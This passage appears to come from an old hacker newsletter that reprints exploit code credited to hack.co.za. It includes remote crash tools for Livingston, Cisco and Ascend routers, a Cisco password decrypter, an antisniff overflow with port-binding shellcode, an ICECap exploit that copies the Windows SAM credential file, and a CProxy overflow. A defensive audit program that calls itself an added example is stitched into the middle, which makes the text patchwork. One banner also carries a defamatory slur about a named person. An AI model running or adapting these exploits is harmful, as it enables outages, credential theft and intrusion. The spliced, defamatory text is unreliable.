sizeof(bsdi_shell)); *(ptr+1000) = 0x00; return(tmp); } void shell(int sock) { fd_set rset; char bu[1024]; write(sock, "cd /; id; pwd; uname -a;\n", 25); FD_ZERO(&rset); for(;;){ FD_SET(fileno(stdin), &rset); FD_SET(sock, &rset); if(select(MAX(sock, fileno(stdin))+1, &rset, NULL, NULL, NULL) < 0){ perror("select"); exit(-1); } if(FD_ISSET(sock, &rset)){ char buf[1024]; int n; bzero(buf, sizeof(buf)); n = read(sock, buf, sizeof(buf)-1); if(n == 0){ printf("EOF from server\n"); exit(0); } if(n < 0){ perror("read"); exit(-1); } else { write(1, buf, n); } } if(FD_ISSET(fileno(stdin), &rset)){ char buf[1024]; bzero(buf, sizeof(buf)); if(fgets(buf, sizeof(buf)-4, stdin) == NULL){ printf("OK. Quitting\n"); close(sock); exit(0); } strcat(buf, "\n"); if(write(sock, buf, strlen(buf)) < 0){ perror("write"); exit(0); } } } } /* www.hack.co.za [19 May]*/ @HWA 252.0 [IND] pmcrash.c router/livingston remote dos attack. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /* The following code will crash ANY Livingston PortMaster. It telnets the the portmaster and overflows its buffers. Thanks to 'The Doc' for this one. */ /* pmcrash - note this'll work much faster if all your arguments are IP addresses.. mainly because I didn't feel like coding a structure to keep track of all the resolved names.. so write a script to resolve your list of names first, then provide those as arguments */ /* This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. 
* * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. */ /* Compiling instructions: Linux: gcc -O2 -fomit-frame-pounter -s -o pmfinger pmfinger.c Solaris 2.4: cc -O -s -o pmfinger pmfinger.c -lsocket -lnsl -lresolv -lucb */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifndef sys_errlist extern char *sys_errlist[]; #endif #ifndef errno extern int errno; #endif /* Inet sockets :-) */ int num=0; int socks[250]; /* show sessions flag */ unsigned short int showflag=0; char * mystrerror(int err) { return(sys_errlist[err]); } void exitprog(void) { while(num--) { shutdown(socks[num-1],0); close(socks[num-1]); } exit(0); } unsigned long int resolver(host) char *host; { unsigned long int ip=0L; if(host && *host && (ip=inet_addr(host))==-1) { struct hostent *he; if(!(he=gethostbyname((char *)host))) ip=0L; else ip=*(unsigned long *)he->h_addr_list[0]; } return(ip); } void usage(void) { puts("pmcrash v0.2a - ComOS System Rebooter :-)\n" "Copyright (C) 1995 LAME Communications\n" "Written by Dr. Delete, Ph.D.\n\n" "Usage: pmcrash [:port] [[:port] ... 
]\n"); exit(0); } void main(int argc,char *argv[]) { unsigned short int port=0,x=1; struct sockaddr_in server; char crash[] = { 0xFF,0xF3,0xFF,0xF3,0xFF,0xF3,0xFF,0xF3,0xFF,0xF3 }; char *temp; if(argc<2) usage(); signal(SIGPIPE,(void (*)())exitprog); signal(SIGHUP,(void (*)())exitprog); signal(SIGINT,(void (*)())exitprog); signal(SIGTERM,(void (*)())exitprog); signal(SIGBUS,(void (*)())exitprog); signal(SIGABRT,(void (*)())exitprog); signal(SIGSEGV,(void (*)())exitprog); server.sin_family=AF_INET; printf("\nConnecting..."); fflush(stdout); for(;x #include #include #include #include #include #include #include #include #include #include #include #include #include #include int net_connect (struct sockaddr_in *cs, char *server, unsigned short int port, char *sourceip, unsigned short int sourceport, int sec); void net_write (int fd, const char *str, ...); unsigned long int net_resolve (char *host); void usage (void) { printf ("usage: ./cisco host times\n"); exit (EXIT_FAILURE); } int main (int argc, char *argv[]) { char host[256]; int port,times,count,sd = 0; int m = 0; struct sockaddr_in cs; printf ("Cisco 760 series Connection Overflow.\n"); printf ("-------------------------------------\n"); if (argc < 3) usage(); strcpy (host, argv[1]); times=atoi (argv[2]); if ((times < 1) || (times > 10000)) /*Maximum number of connections*/ usage(); port =23; /* This might be changed to the telnet port of the router*/ printf ("Host: %s Times: %d\n", host, times); for (count=0;countsin_family = AF_INET; cs->sin_port = htons (port); fd = socket (cs->sin_family, SOCK_STREAM, 0); if (fd == -1) return (-1); if (!(cs->sin_addr.s_addr = net_resolve (server))) { close (fd); return (-1); } flags = fcntl (fd, F_GETFL, 0); if (flags == -1) { close (fd); return (-1); } n = fcntl (fd, F_SETFL, flags | O_NONBLOCK); if (n == -1) { close (fd); return (-1); } error = 0; n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in)); if (n < 0) { if (errno != EINPROGRESS) { close (fd); 
return (-1); } } if (n == 0) goto done; FD_ZERO(&rset); FD_ZERO(&wset); FD_SET(fd, &rset); FD_SET(fd, &wset); tv.tv_sec = sec; tv.tv_usec = 0; n = select(fd + 1, &rset, &wset, NULL, &tv); if (n == 0) { close(fd); errno = ETIMEDOUT; return (-1); } if (n == -1) return (-1); if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) { if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) { len = sizeof(error); if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) { errno = ETIMEDOUT; return (-1); } if (error == 0) { goto done; } else { errno = error; return (-1); } } } else return (-1); done: n = fcntl(fd, F_SETFL, flags); if (n == -1) return (-1); return (fd); } unsigned long int net_resolve (char *host) { long i; struct hostent *he; i = inet_addr(host); if (i == -1) { he = gethostbyname(host); if (he == NULL) { return (0); } else { return (*(unsigned long *) he->h_addr); } } return (i); } void net_write (int fd, const char *str, ...) { char tmp[8192]; va_list vl; int i; va_start(vl, str); memset(tmp, 0, sizeof(tmp)); i = vsnprintf(tmp, sizeof(tmp), str, vl); va_end(vl); send(fd, tmp, i, 0); return; } /* www.hack.co.za [19 May]*/ @HWA 254.0 [IND] ascend.c ascend remote dos attack by the posse. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /* The Posse Brings you: The Linux Ascend Kill Program! Kill your local ISP (or even non-local) 313373133731337313373133731337313373133731337313373133731337313373133731337 1 3 3 1 3 Because Ascend has such a strong programming department that would 3 7 never under any circumstances release a version of their code which 3 3 contained a bug. 7 1 3 3 Well. Ascend did it again. Those pesky non zero length tcp offset's 1 3 do it everytime! Are those fault lights available in christmas colors 3 7 in time for the season? h0h0h0.. 3 3 7 1 BTW, if anyone has any pictures of MSN pops, please post them to 3 3 someplace public so we can all share in the season spirit. 1 3 3 7 - The Posse is back! 
3 3 7 1 greetz to : alpha bits, the grave digger, and fast freddy. 3 3 1 3 Goto our eleet ftp sitez: 3 7 3 3 7 1 The Dark Dungeon 198.34.1xx.xxx 600 gigz online! 3 3 Strobe Room 34.101.1xx.xxx 1TB of Warez and H/P/V/A/C/K text 1 3 3 731337313373133731337313373133731337313373133731337313373133731337313373133 3 7 1 2600.com is run off vnetmax.villagenet.com (205.136.35.3) 3 3 Keep your support of 2600, help Emmanuel play with his little boys 1 3 3 731337313373133731337313373133731337313373133731337313373133731337313373133 3 */ #include #include #include #include #include #include #include #include #include #include #include #include unsigned short compute_tcp_checksum(struct tcphdr *th, int len, unsigned long saddr, unsigned long daddr) { unsigned long sum; __asm__(" addl %%ecx, %%ebx adcl %%edx, %%ebx adcl $0, %%ebx " : "=b"(sum) : "0"(daddr), "c"(saddr), "d"((ntohs(len) << 16) + IPPROTO_TCP*256) : "bx", "cx", "dx" ); __asm__(" movl %%ecx, %%edx cld cmpl $32, %%ecx jb 2f shrl $5, %%ecx clc 1: lodsl adcl %%eax, %%ebx lodsl adcl %%eax, %%ebx lodsl adcl %%eax, %%ebx lodsl adcl %%eax, %%ebx lodsl adcl %%eax, %%ebx lodsl adcl %%eax, %%ebx lodsl adcl %%eax, %%ebx lodsl adcl %%eax, %%ebx loop 1b adcl $0, %%ebx movl %%edx, %%ecx 2: andl $28, %%ecx je 4f shrl $2, %%ecx clc 3: lodsl adcl %%eax, %%ebx loop 3b adcl $0, %%ebx 4: movl $0, %%eax testw $2, %%dx je 5f lodsw addl %%eax, %%ebx adcl $0, %%ebx movw $0, %%ax 5: test $1, %%edx je 6f lodsb addl %%eax, %%ebx adcl $0, %%ebx 6: movl %%ebx, %%eax shrl $16, %%eax addw %%ax, %%bx adcw $0, %%bx " : "=b"(sum) : "0"(sum), "c"(len), "S"(th) : "ax", "bx", "cx", "dx", "si" ); return((~sum) & 0xffff); } #define psize ( sizeof(struct iphdr) + sizeof(struct tcphdr) ) #define tcp_offset ( sizeof(struct iphdr) ) #define err(x) { fprintf(stderr, x); exit(1); } #define errors(x, y) { fprintf(stderr, x, y); exit(1); } struct iphdr temp_ip; int temp_socket = 0; u_short ip_checksum (u_short * buf, int nwords) { unsigned long sum; for (sum = 0; 
nwords > 0; nwords--) sum += *buf++; sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); return ~sum; } void fixhost (struct sockaddr_in *addr, char *hostname) { struct sockaddr_in *address; struct hostent *host; address = (struct sockaddr_in *) addr; (void) bzero ((char *) address, sizeof (struct sockaddr_in)); address->sin_family = AF_INET; address->sin_addr.s_addr = inet_addr (hostname); if ((int) address->sin_addr.s_addr == -1) { host = gethostbyname (hostname); if (host) { bcopy (host->h_addr, (char *) &address->sin_addr, host->h_length); } else { puts ("Couldn't resolve address!!!"); exit (-1); } } } unsigned int lookup (host) char *host; { unsigned int addr; struct hostent *he; addr = inet_addr (host); if (addr == -1) { he = gethostbyname (host); if ((he == NULL) || (he->h_name == NULL) || (he->h_addr_list == NULL)) return 0; bcopy (*(he->h_addr_list), &(addr), sizeof (he->h_addr_list)); } return (addr); } unsigned short lookup_port (p) char *p; { int i; struct servent *s; if ((i = atoi (p)) == 0) { if ((s = getservbyname (p, "tcp")) == NULL) errors ("Unknown port %s\n", p); i = ntohs (s->s_port); } return ((unsigned short) i); } void spoof_packet (struct sockaddr_in local, int fromport, \ struct sockaddr_in remote, int toport, ulong sequence, \ int sock, u_char theflag, ulong acknum, \ char *packdata, int datalen) { char *packet; int tempint; if (datalen > 0) datalen++; packet = (char *) malloc (psize + datalen); tempint = toport; toport = fromport; fromport = tempint; { struct tcphdr *fake_tcp; fake_tcp = (struct tcphdr *) (packet + tcp_offset); fake_tcp->th_dport = htons (fromport); fake_tcp->th_sport = htons (toport); fake_tcp->th_flags = theflag; fake_tcp->th_seq = random (); fake_tcp->th_ack = random (); /* this is what really matters, however we randomize everything else to prevent simple rule based filters */ fake_tcp->th_off = random (); fake_tcp->th_win = random (); fake_tcp->th_urp = random (); } if (datalen > 0) { char *tempbuf; tempbuf = 
(char *) (packet + tcp_offset + sizeof (struct tcphdr)); for (tempint = 0; tempint < datalen - 1; tempint++) { *tempbuf = *packdata; *tempbuf++; *packdata++; } *tempbuf = '\r'; } { struct iphdr *real_ip; real_ip = (struct iphdr *) packet; real_ip->version = 4; real_ip->ihl = 5; real_ip->tot_len = htons (psize + datalen); real_ip->tos = 0; real_ip->ttl = 64; real_ip->protocol = 6; real_ip->check = 0; real_ip->id = 10786; real_ip->frag_off = 0; bcopy ((char *) &local.sin_addr, &real_ip->daddr, sizeof (real_ip->daddr)); bcopy ((char *) &remote.sin_addr, &real_ip->saddr, sizeof (real_ip->saddr)); temp_ip.saddr = htonl (ntohl (real_ip->daddr)); real_ip->daddr = htonl (ntohl (real_ip->saddr)); real_ip->saddr = temp_ip.saddr; real_ip->check = ip_checksum ((u_short *) packet, sizeof (struct iphdr) >> 1); { struct tcphdr *another_tcp; another_tcp = (struct tcphdr *) (packet + tcp_offset); another_tcp->th_sum = 0; another_tcp->th_sum = compute_tcp_checksum (another_tcp, sizeof (struct tcphdr) + datalen, real_ip->saddr, real_ip->daddr); } } { int result; sock = (int) temp_socket; result = sendto (sock, packet, psize + datalen, 0, (struct sockaddr *) &remote, sizeof (remote)); } free (packet); } void main (argc, argv) int argc; char **argv; { unsigned int daddr; unsigned short dport; struct sockaddr_in sin; int s, i; struct sockaddr_in local, remote; u_long start_seq = 4935835 + getpid (); if (argc != 3) errors ("Usage: %s \n\nDest port of 23 for Ascend units.\n", argv[0]); if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) err ("Unable to open raw socket.\n"); if ((temp_socket = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) err ("Unable to open raw socket.\n"); if (!(daddr = lookup (argv[1]))) err ("Unable to lookup destination address.\n"); dport = lookup_port (argv[2]); sin.sin_family = AF_INET; sin.sin_addr.s_addr = daddr; sin.sin_port = dport; fixhost ((struct sockaddr_in *)(struct sockaddr *) &local, argv[1]); fixhost ((struct sockaddr_in *)(struct sockaddr *) 
&remote, argv[1]); /* 500 seems to be enough to kill it */ for (i = 0; i < 500; i++) { start_seq++; local.sin_addr.s_addr = random (); spoof_packet (local, random (), remote, dport, start_seq, (int) s, TH_SYN | TH_RST | TH_ACK, 0, NULL, 0); } } /* www.hack.co.za [19 May]*/ @HWA 255.0 [IND] ciscocrack.c / ciscocrack.pl cisco password cracker. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /* * Cisco password decrypter V2.0 * (c) 1995 by SPHiXe * * DISCLAIMER: The author of this program takes no responsibility for * neither direct nor indirect damages caused by this program. * Misuse of this program may lead to serious problems with * your local authorities... * You should know what you're doing. */ #include #include char xlat[] = { 0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f, 0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72, 0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44 }; char pw_str1[] = "password 7 "; char pw_str2[] = "enable-password 7 "; char *pname; cdecrypt(enc_pw, dec_pw) char *enc_pw; char *dec_pw; { unsigned int seed, i, val = 0; if(strlen(enc_pw) & 1) return(-1); seed = (enc_pw[0] - '0') * 10 + enc_pw[1] - '0'; if (seed > 15 || !isdigit(enc_pw[0]) || !isdigit(enc_pw[1])) return(-1); for (i = 2 ; i <= strlen(enc_pw); i++) { if(i !=2 && !(i & 1)) { dec_pw[i / 2 - 2] = val ^ xlat[seed++]; val = 0; } val *= 16; if(isdigit(enc_pw[i] = toupper(enc_pw[i]))) { val += enc_pw[i] - '0'; continue; } if(enc_pw[i] >= 'A' && enc_pw[i] <= 'F') { val += enc_pw[i] - 'A' + 10; continue; } if(strlen(enc_pw) != i) return(-1); } dec_pw[++i / 2] = 0; return(0); } usage() { fprintf(stdout, "Usage: %s -p \n", pname); fprintf(stdout, " %s \n", pname); return(0); } main(argc,argv) int argc; char **argv; { FILE *in = stdin, *out = stdout; char line[257]; char passwd[65]; unsigned int i, pw_pos; pname = argv[0]; if(argc > 1) { if(argc > 3) { usage(); exit(1); } if(argv[1][0] == '-') { switch(argv[1][1]) { case 'h': usage(); break; case 'p': if(cdecrypt(argv[2], passwd)) { 
                    fprintf(stderr, "Error.\n");
                    exit(1);
                }
                fprintf(stdout, "password: %s\n", passwd);
                break;
            default:
                fprintf(stderr, "%s: unknow option.", pname);
            }
            return(0);
        }
        if((in = fopen(argv[1], "rt")) == NULL)
            exit(1);
        if(argc > 2)
            if((out = fopen(argv[2], "wt")) == NULL)
                exit(1);
    }
    while(1) {
        for(i = 0; i < 256; i++) {
            if((line[i] = fgetc(in)) == EOF) {
                if(i)
                    break;
                fclose(in);
                fclose(out);
                return(0);
            }
            if(line[i] == '\r')
                i--;
            if(line[i] == '\n')
                break;
        }
        pw_pos = 0;
        line[i] = 0;
        if(!strncmp(line, pw_str1, strlen(pw_str1)))
            pw_pos = strlen(pw_str1);
        if(!strncmp(line, pw_str2, strlen(pw_str2)))
            pw_pos = strlen(pw_str2);
        if(!pw_pos) {
            fprintf(stdout, "%s\n", line);
            continue;
        }
        if(cdecrypt(&line[pw_pos], passwd)) {
            fprintf(stderr, "Error.\n");
            exit(1);
        }
        else {
            if(pw_pos == strlen(pw_str1))
                fprintf(out, "%s", pw_str1);
            else
                fprintf(out, "%s", pw_str2);
            fprintf(out, "%s\n", passwd);
        }
    }
}

/* www.hack.co.za [19 May]*/

-=-

#! /bin/sh
## Decrypts cisco "encrypted" passwords.  Feed this confg files as stdin.
## Anything that looks like a "type 7 encrypted" string gets decrypted.
## This should really be a C program, but is presented as a script just to
## piss off a certain group of people.  One beer, please...

while read xx ; do
  case "$xx" in
    *d\ 7\ [01]??* ) ;;
    *) continue ;;
  esac
  DEC=`echo "$xx" | sed -e 's/.* //' -e 's/\(^..\).*/\1/'`
  DP1=`expr $DEC + 1`
  HEX=`echo "$xx" | sed -e 's/.* //' -e 's/^..\(..*\)/\1/'`
  echo 'dsfd;kfoA,.iyewrkldJKDHSUB' | cut -c "${DP1}-30" > /tmp/cis$$.pad
  echo '#' > /tmp/cis$$.in
  for xx in 1-2 3-4 5-6 7-8 9-10 11-12 13-14 15-16 17-18 19-20 21-22 ; do
    echo "${HEX}" | cut -c $xx | sed -e '/^$/q' -e 's/^/0x/' >> /tmp/cis$$.in
  done
  echo -n "${DEC}${HEX}: "
  data -g < /tmp/cis$$.in | xor /tmp/cis$$.pad
  echo ''
done
rm -f /tmp/cis$$.pad /tmp/cis$$.in
exit 0

# Discussion:

# When "service password-encryption" is configured into a cisco router and
# the configuration subsequently viewed, the passwords are no longer printed
# as plaintext but as strings of randomish-looking garbage.  Analysis of
# several samples reveals the scrambling algorithm to be trivially weak.
# Dr. Delete derived and published an analysis and decryption program some
# time ago, but since that didn't seem to be generally available at the time
# I went looking for it, here is an independent explanation.  This was worked
# out on PAPER over a plate of nachos in a hotel bar in downtown LA, but
# still illustrates where a general-purpose "xor" handler can be useful for
# quickly cracking lame "proprietary" algorithms of this genre.

# Passwords can be up to eleven mixed-case characters.  In the "encrypted"
# representation, the first two bytes of the long string are a random decimal
# offset between 0 and 15 into a magic block of characters, and the remaining
# bytes are ascii-hex representations of the password bytes xored against
# the character-block bytes from the given offset on down.  The character
# block is "dsfd;kfoA,.iyewrkldJKDHSUB", which is enough for a maximum-length
# password at the maximum offset.

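The scheme described in the paragraph above, turned into a config audit as an added example (not part of the original script or its author's code): it flags type 7 lines and confirms they are reversible without printing the recovered secret. It uses only the 26-character block quoted in the discussion and rejects any string that would index past it; the function names and the sample config are constructed for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Character block quoted in the discussion above (26 bytes). */
static const char T7_BLOCK[] = "dsfd;kfoA,.iyewrkldJKDHSUB";
#define T7_BLOCK_LEN (sizeof(T7_BLOCK) - 1)

enum { T7_OK = 0, T7_MALFORMED = -1, T7_RANGE = -2 };
enum { AUDIT_CLEAN = 0, AUDIT_REVERSIBLE = 1, AUDIT_UNDECODED = 2 };

static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    c = toupper((unsigned char)c);
    return (c >= 'A' && c <= 'F') ? c - 'A' + 10 : -1;
}

/* Decode "<2-digit offset><hex pairs>" into out. Leaves enc untouched and
 * refuses input that would index past the block or overflow out. */
int type7_decode(const char *enc, char *out, size_t outlen)
{
    size_t len = strlen(enc), n, i;
    unsigned seed;

    if (len < 4 || (len & 1)) return T7_MALFORMED;
    if (!isdigit((unsigned char)enc[0]) || !isdigit((unsigned char)enc[1]))
        return T7_MALFORMED;
    seed = (unsigned)(enc[0] - '0') * 10 + (unsigned)(enc[1] - '0');
    if (seed > 15) return T7_MALFORMED;          /* offset is 0..15 */
    n = (len - 2) / 2;                           /* number of password bytes */
    if (seed + n > T7_BLOCK_LEN || n + 1 > outlen) return T7_RANGE;
    for (i = 0; i < n; i++) {
        int hi = hexval(enc[2 + 2 * i]), lo = hexval(enc[3 + 2 * i]);
        if (hi < 0 || lo < 0) return T7_MALFORMED;
        out[i] = (char)(((hi << 4) | lo) ^ T7_BLOCK[seed + i]);
    }
    out[n] = '\0';
    return T7_OK;
}

/* Classify one config line; *pwlen receives the recovered length, never
 * the secret itself, so audit output is safe to log. */
int audit_line(const char *line, size_t *pwlen)
{
    static const char marker[] = "password 7 ";  /* also matches enable-password 7 */
    const char *p = strstr(line, marker);
    char tok[64], plain[32];
    size_t n;

    *pwlen = 0;
    if (p == NULL) return AUDIT_CLEAN;
    p += sizeof(marker) - 1;
    n = strcspn(p, " \t\r\n");
    if (n == 0 || n >= sizeof(tok)) return AUDIT_UNDECODED;
    memcpy(tok, p, n);
    tok[n] = '\0';
    if (type7_decode(tok, plain, sizeof(plain)) != T7_OK) return AUDIT_UNDECODED;
    *pwlen = (n - 2) / 2;
    return AUDIT_REVERSIBLE;
}

/* Walk a whole config held in memory; returns the number of flagged lines. */
int audit_config(const char *cfg)
{
    char line[256];
    int lineno = 0, flagged = 0;

    while (*cfg) {
        size_t n = strcspn(cfg, "\n"), pwlen;
        size_t c = n < sizeof(line) - 1 ? n : sizeof(line) - 1;
        int r;

        memcpy(line, cfg, c);
        line[c] = '\0';
        lineno++;
        r = audit_line(line, &pwlen);
        if (r == AUDIT_REVERSIBLE)
            printf("line %d: type 7, reversible (%lu chars)\n", lineno, (unsigned long)pwlen);
        else if (r == AUDIT_UNDECODED)
            printf("line %d: type 7, outside the described format\n", lineno);
        flagged += (r != AUDIT_CLEAN);
        cfg += n;
        if (*cfg == '\n') cfg++;
    }
    return flagged;
}

/* Constructed sample config; the type 5 value is a placeholder. */
static const char SAMPLE_CONFIG[] =
    "hostname lab-router\n"
    "enable secret 5 $1$CONSTRUCTED$placeholder\n"
    "enable-password 7 0822455D0A16\n"
    "line vty 0 4\n"
    " password 7 1513\n";

int main(void)
{
    printf("%d line(s) need a stronger credential type\n", audit_config(SAMPLE_CONFIG));
    return 0;
}
```

Any line it reports should be moved to a one-way hashed credential such as `enable secret`, since the stored type 7 string is recoverable from the config alone.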
# Another character block consisting of "sgvca69834ncxv9873254k;fg87" is
# located after the first one in the IOS image, which may be relevant to
# something else and is simply mentioned here for posterity.  It is also
# interesting to note that the strings "%02d" and "%02x" occur immediately
# afterward, which in light of the above is another clue.

# _H* 960315
# www.hack.co.za [14 May]#

@HWA

256.0 [IND] l0phtl0phe-kid.c remote linux misc overflow by scut/teso.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      http://teso.scene.at/%20

/* l0phtl0phe-kid.c - antisniff exploit (1-1-1 "second fixed version" included)
 *
 * -scut/teso
 *
 * gcc -o l0phtl0phe l0phtl0phe.c -Wall -lnet `libnet-config --defines`
 *
 * description:
 * l0pht messed up the fix for their problem in antisniff by not regarding
 * the type signedness properties of the char and int values used. this
 * results in a cool method bypassing the two extra checks (length + strncat).
 * some work on this topic has been done by mixter, (bad results on type
 * casting), but it should be obvious to any security conscious programmers.
 * i'm not stating that they aren't allowed errors, but they should fix it
 * for sure if they're going to fix it at all. -sc.
 *
 * 2nd version: script kiddie proof to avoid that "doesn't work" lamer claim.
 *
 * greetings to all teso, lam3rz, hert, adm, w00w00 and lsd ppl.
*/ #include #include #include #include #include #define OFFSET 0xbffef9a0 unsigned int build_xp (unsigned char *xp); int main (int argc, char *argv[]) { int sock; /* raw socket */ u_long src_ip, dst_ip; unsigned char xpbuf[1024]; /* this one gets complicated now */ unsigned char tpack[2048]; /* paket buffer */ unsigned int pl_len; if (argc != 3) { printf ("usage: %s \n\n", argv[0]); exit (EXIT_FAILURE); } sock = libnet_open_raw_sock (IPPROTO_RAW); if (sock == -1) { perror ("libnet_open_raw_sock"); exit (EXIT_FAILURE); } src_ip = libnet_name_resolve (argv[1], 0); dst_ip = libnet_name_resolve (argv[2], 0); pl_len = build_xp (xpbuf); libnet_build_ip (UDP_H + DNS_H + pl_len, 0, 7350, 0, 2, IPPROTO_UDP, src_ip, dst_ip, NULL, 0, tpack); libnet_build_udp (libnet_get_prand (PRu16), 53, NULL, 0, tpack + IP_H); libnet_build_dns (libnet_get_prand (PRu16), 0x0000, 1, 0, 0, 0, xpbuf, pl_len, tpack + IP_H + UDP_H); libnet_do_checksum (tpack, IPPROTO_UDP, UDP_H + DNS_H + pl_len); /* they use "udp and dst port 53" as bpf, so we should have no problem */ libnet_write_ip (sock, tpack, UDP_H + IP_H + DNS_H + pl_len); libnet_close_raw_sock (sock); printf ("exploitation succeeded.\n"); printf ("try: \"telnet %s 17664\" now.\n", argv[2]); exit (EXIT_SUCCESS); } /* build_xp * * build exploit buffer into buffer pointed to by `xp'. 
*/ unsigned int build_xp (unsigned char *xp) { int i; unsigned char buf[1024]; unsigned char shellcode[] = /* portshell 17644 portshellcode by smiler & scut */ "\x31\xc0\xb0\x02\xcd\x80\x09\xc0\x74\x06\x31\xc0" "\xfe\xc0\xcd\x80\xeb\x76\x5f\x89\x4f\x10\xfe\xc1" "\x89\x4f\x0c\xfe\xc1\x89\x4f\x08\x8d\x4f\x08\xfe" "\xc3\xb0\x66\xcd\x80\xfe\xc3\xc6\x47\x10\x10\x66" "\x89\x5f\x14\x88\x47\x08\xb0\x45\x66\x89\x47\x16" "\x89\x57\x18\x8d\x4f\x14\x89\x4f\x0c\x8d\x4f\x08" "\xb0\x66\xcd\x80\x89\x5f\x0c\xfe\xc3\xfe\xc3\xb0" "\x66\xcd\x80\x89\x57\x0c\x89\x57\x10\xfe\xc3\xb0" "\x66\xcd\x80\x31\xc9\x88\xc3\xb0\x3f\xcd\x80\xfe" "\xc1\xb0\x3f\xcd\x80\xfe\xc1\xb0\x3f\xcd\x80\x31" "\xd2\x88\x57\x07\x89\x7f\x0c\x89\xfb\x8d\x4f\x0c" "\xb0\x0b\xcd\x80\x31\xc0\x99\x31\xdb\x31\xc9\xe8" "\x7e\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"; unsigned char head[] = "\x07-7350-\x00\xfe"; memcpy (buf, head, 9); for (i = 9 ; i < (sizeof (buf) - strlen (shellcode)) ; ++i) buf[i] = '\x90'; memcpy (buf + sizeof (buf) - strlen (shellcode), shellcode, strlen (shellcode)); buf[272] = '\xeb'; buf[273] = '\x08'; buf[274] = (OFFSET ) & 0xff; buf[275] = (OFFSET >> 8) & 0xff; buf[276] = (OFFSET >> 16) & 0xff; buf[277] = (OFFSET >> 24) & 0xff; memcpy (xp, buf, sizeof (buf)); return (sizeof (buf));; } /* www.hack.co.za [19 May]*/ @HWA 257.0 [IND] RFPickaxe.pl winnt remote exploit. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #!/usr/bin/perl # # RFPickaxe.pl - demo exploit for default ICECap login/alerts # Disclaimer: I do not provide technical support for my exploits! 
# # Sorry, this requires Unix, due to the `date` call $|=1; use Socket; ############################################################### # IP of ICECap system (assumes port 8082) $Target="10.10.200.4"; # account info - uses default 'iceman' w/ no password $account="iceman"; $httpauth="aWNlbWFuOiUzQjclQzYlRkU="; #-------- attributes of the alert ---------- $id="100005"; $issue_name="Exploit"; $sev="1"; # spoof these $target="0.0.0.8"; $target_dns="some.host.com"; $det_ip="0.0.0.8"; $det_nbn="SENSOR"; $int_ip="255.255.255.255"; $param="Pickaxe"; # either fake the MAC, or use it to run commands via JET vulnerability #$det_mac="0000000000000"; $det_mac="|shell(\"cmd /c copy c:\\winnt\\repair\\sam._ ". "c:\\progra~1\\networ~1\\icecap\\spatch\\en\\sam.exe \")|"; ############################################################## $inet=inet_aton($Target); $time=`date -u "+%Y-%m-%d %T"`; $time=~s/ /%20/g; $time=~s/:/%3a/g; #path is \program files\network ice\icecap\spatch\en $alert="accountName=$account&issueID=$id&issueName=$issue_name". "&severity=$sev&targetNetAddress=$target&targetDNSName=". "$target_dns&detectorNetAddress=$det_ip&detectorNetBIOS". "Name=$det_nbn&detectorMacAddress=$det_mac&". "intruderNetAddress=$int_ip&detectorType=3&startTime=". "$time¶meter=$param\r\n"; $len=length($alert); @DXX=(); $send=<; select(STDOUT); close(S); alarm(0); return; } else { die("not responding"); } alarm(0);}; if ($@) { if ($@ =~ /timeout/){ die("Timed out!\n");}}} # www.hack.co.za [18 May]# @HWA 258.0 [IND] cproxy.c winnt remote dos attack by |[TDP]|. 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ tdp@psynet.net /* * Remote Denial of Service for CProxy v3.3 - Service Pack 2 * * (C) |[TDP]| - HaCk-13 TeaM - 2000 * * * This program xploits an overflow vulnerability in CProxy 3.3 SP2 * HTTP Service (8080), causing server shutdown * * Greetings to all the other members and all my friends :) */ #include #include #include #include #include #include #include #include #define BUFFERSIZE 247 #define NOP 0x90 // If you change this values you can change EIP and EBP values // to redirect to a code that you want >;) #define EIP 0x61616161 #define EBP 0x61616161 void usage(char *progname) { fprintf(stderr,"Usage: %s [eip] [ebp]\n",progname); exit(1); } int main(int argc, char **argv) { char *ptr,buffer[BUFFERSIZE], remotedos[1024]; unsigned long *long_ptr,eip=EIP, ebp=EBP; int aux,sock; struct sockaddr_in sin; unsigned long ip; struct hostent *he; fprintf(stderr,"\n-= Remote DoS for CProxy v3.3 ServicePack 2 - (C) |[TDP]| - H13 Team =-\n"); if (argc<2) usage(argv[0]); if (argc>=3) eip+=atol(argv[2]); if (argc>=4) ebp+=atol(argv[3]); ptr=buffer; memset(ptr,0,sizeof(buffer)); memset(ptr,NOP,sizeof(buffer)-8); ptr+=sizeof(buffer)-8; long_ptr=(unsigned long*)ptr; *(long_ptr++) = ebp; *(long_ptr++) = eip; ptr=(char *)long_ptr; *ptr='\0'; bzero(remotedos, sizeof(remotedos)); snprintf(remotedos, sizeof(remotedos), "GET http://%s HTTP/1.0\r\n\r\n\r\n",buffer); if ((sock = socket(AF_INET, SOCK_STREAM, 